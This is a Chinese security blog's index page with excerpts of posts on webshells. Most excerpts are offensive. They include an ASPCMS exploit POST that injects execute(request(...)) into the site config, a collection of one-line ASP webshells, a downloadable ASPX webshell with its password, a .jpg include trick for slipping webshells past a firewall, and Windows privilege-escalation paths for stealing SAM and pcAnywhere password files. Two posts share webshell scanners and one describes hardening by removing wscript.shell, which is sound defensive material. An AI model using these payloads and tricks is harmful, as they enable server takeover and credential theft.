当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令

分类:安全 | 2016-10-6 | 撸过 3,784 次
3人扯谈
<?php

/*
==============
*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$user = "anlfi";[......]

继续阅读

ASPCMS 老版本秒杀拿SHELL

分类:安全 | 2013-02-12 | 撸过 2,088 次
1人扯谈

老的ASPCMS版本的秒杀拿SHELL漏洞

找到后台。。。然后

/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST

runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&S[......]

继续阅读

TNTHK小组内部版webshell密码破解

分类:安全 | 2013-01-3 | 撸过 1,289 次
3人扯谈

下面简单的揭露下怎么获取webshell后门密码

1. 在password登陆框 随便输入一错误密码,提示error,如图:


2. 然后右键查看源文件,搜索[password],font 后面跟的就是shell密码,测试一下


3. 按照上面的方法,貌似通杀…

删除、恢复wscript.shell

分类:技术 | 2012-08-23 | 撸过 578 次
0人扯谈

由于担心有些网站有注入漏洞,在安装服务器的时候删除了FSO,stream,WSCRIPT.SHELL等组建。结果安装VMware的时候,提示wscript.shell找不到。

 

恢复wscript.shell

 

建议如果真的为了安全一定要删除这些!

 

下面给出卸载和删除的方法

 

卸载wscript.shell对象,在cmd下或直接运行:

regsvr32 /u %windir%\system32\WSHom.Ocx

 

卸载FSO对象,在cmd下或直接运行:

regsvr32.ex[......]

继续阅读

自己写的php木马webshell扫描器

分类:技术 | 2012-06-15 | 撸过 797 次
0人扯谈

因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来
 

<?php
/*
+--------------------------------------------------------------------------+
| Codz by indexphp           Version:0.01                              |
| (c) 2009 indexphp[......]

继续阅读

一款不错的webshell-aspx

分类:工具 | 2012-02-28 | 撸过 1,071 次
0人扯谈

密码是:yhsafe 自己拿去改吧!

下载地址:webshell-aspx

突破护卫神防火墙拦截传马

分类:安全 | 2012-01-23 | 撸过 507 次
0人扯谈

护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀!

所以可以用包含的方式

asp

<!--#include file="../UpLoadFile/2011091711453973499.jpg" -->

php

<?php

include "2.htm";

?>

用这种方式的话!就不会被杀掉了!

细心就能发现原来如此!

现在在想法子突破不能添加到组的问题!如果有兴趣的可以一起研究下

PHP Web 木马扫描器代码

分类:技术 | 2012-01-18 | 撸过 836 次
1人扯谈

scanner.php:

<?php
/**************PHP Web木马扫描器************************/
/* [+] 作者: alibaba */
/* [+] QQ: 1499281192 */
/* [+] MSN: weeming21@hotmail.com */
/* [+] 首发: t00ls.net , 转载请注明t00ls */
/* [+] 版本: v1.0 */
/* [+] 功能: web版php木马扫描工具*/
/* [+] 注意: 扫描出来的文件并不一定就是后门, */
/* 请自行判断、审核、对比原文件。*/
/* 如果你[......]

继续阅读

号称“最全的WEBSHELL提权大大全

分类:安全 | 2011-12-25 | 撸过 635 次
0人扯谈

第一,WEBSHELL 权限提升技巧
C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的 CIF 文件,破解得到 pcAnywhere
密码,登陆
c:\ProgramFiles\serv-u\
C:\WINNT\system32\config\
下它的 SAM,破解密码
c:\winnt\system32\inetsrv\data\
是 erveryone完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
c:\perl
C:\Program[......]

继续阅读

webshell一句话木马大全

分类:安全 | 2011-12-16 | 撸过 11,822 次
0人扯谈

 

比较全的webshell一句话包括ASP,PHP,ASPX,JSP

asp一句话木马程序代码

<%eval request("sb")%>

程序代码

<%execute request("sb")%>

程序代码

<%execute(request("sb"))%>

程序代码

<%execute request("sb")%><%'<% loop <%:%>

程序代码

<%'<% loop <%:%><%execute request("sb")%>[......]

继续阅读

第 1 页,共 4 页1234